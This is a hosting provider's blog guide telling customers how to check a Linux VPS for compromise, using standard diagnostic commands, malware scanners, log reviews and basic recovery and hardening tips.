Tag: rootkit

๐Ÿ›ก๏ธ How to Check If Your VPS Is Compromised or Infected

Leave a Comment on ๐Ÿ›ก๏ธ How to Check If Your VPS Is Compromised or Infected

If your VPS is behaving strangely, running slow, or using more resources than expected, it could be compromised. Hereโ€™s a simple step-by-step guide for Hosteons clients to help detect common signs of infection or unauthorized access.

โœ… Step 1: Check for Unusual CPU or Memory Usage

Start by checking if any process is consuming excessive resources:

top

or use:

htop

Look for unfamiliar processes, especially those using a high percentage of CPU or memory.

๐Ÿง  Step 2: Check for Unknown Network Connections

You can inspect open ports and active connections with:

ss -tulnp

Also try:

netstat -antup

Check for unknown IP addresses or ports your VPS shouldnโ€™t be using (e.g., cryptomining pools, spam servers, etc.).

๐Ÿ” Step 3: Scan Running Processes

List all processes with their command line details:

ps auxf

Watch for suspicious scripts, base64-encoded strings, or unfamiliar binaries.

๐Ÿ” Step 4: Check for New or Unauthorized Users

List all users:

cat /etc/passwd

Check recent logins:

last

Or failed login attempts:

grep "Failed password" /var/log/auth.log

Watch for users or login attempts you donโ€™t recognize.

๐Ÿ•ต๏ธ Step 5: Inspect Cron Jobs & Scheduled Tasks

Malware often installs cron jobs to maintain persistence:

crontab -l
ls -la /etc/cron*

Look for unusual scripts or scheduled commands.

๐Ÿš Step 6: Scan for Malware

Install and run a malware scanner like Chkrootkit or ClamAV:

Chkrootkit:

apt install chkrootkit   # Debian/Ubuntu
chkrootkit

ClamAV:

apt install clamav
freshclam
clamscan -r /

These tools help detect rootkits, backdoors, and trojans.

๐Ÿ“ Step 7: Check for Suspicious Files

Search for recently modified or hidden files:

find / -type f -mtime -2
find / -name ".*" -type f

Look especially in /tmp, /var/tmp, or /dev/shm โ€” common hiding places for malicious scripts.

๐Ÿ“œ Step 8: Check System Logs

Scan through /var/log/syslog, /var/log/auth.log, and /var/log/messages for any strange activity.

Example:

less /var/log/auth.log

Use grep to search for specific keywords like root, sudo, fail, etc.

๐Ÿšจ What to Do If You Suspect a Compromise

If you suspect your VPS has been compromised:

1. Disconnect from the internet (disable the network interface).

2. Back up important data (be cautious with infected files).

3. Open a support ticket with Hosteons: https://my.hosteons.com

4. Consider wiping and reinstalling the OS for full peace of mind.

5. Change all relevant passwords and SSH keys.

๐Ÿงฏ Prevention Tips

โ€ข Use strong passwords and SSH keys

โ€ข Keep your software and OS updated

โ€ข Disable root login and use a non-root user with sudo

โ€ข Set up a firewall like ufw

โ€ข Regularly monitor your server

Stay secure,

The Hosteons Team